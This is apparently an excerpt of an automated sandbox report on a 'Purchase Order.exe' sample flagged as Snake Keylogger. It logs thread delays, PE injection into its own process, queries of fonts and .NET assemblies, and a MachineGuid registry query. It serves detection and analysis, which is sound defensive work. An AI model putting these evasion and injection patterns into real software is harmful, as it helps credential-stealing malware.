            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597046Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596937Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596828Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596715Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596609Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596500Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596390Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596281Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596171Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596062Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595951Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595843Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595734Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595623Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595515Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595406Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595296Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595187Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595078Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 594968Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 594859Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 594750Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 594640Jump to behavior
            Source: Purchase Order.exe, 00000002.00000002.4124460238.00000000016F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllB
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DB7BA8 LdrInitializeThunk,2_2_05DB7BA8
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\Purchase Order.exeMemory written: C:\Users\user\Desktop\Purchase Order.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess created: C:\Users\user\Desktop\Purchase Order.exe "C:\Users\user\Desktop\Purchase Order.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Users\user\Desktop\Purchase Order.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Users\user\Desktop\Purchase Order.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: 0.2.Purchase Order.exe.456bca8.9.unpack, type: UNPACKEDPE
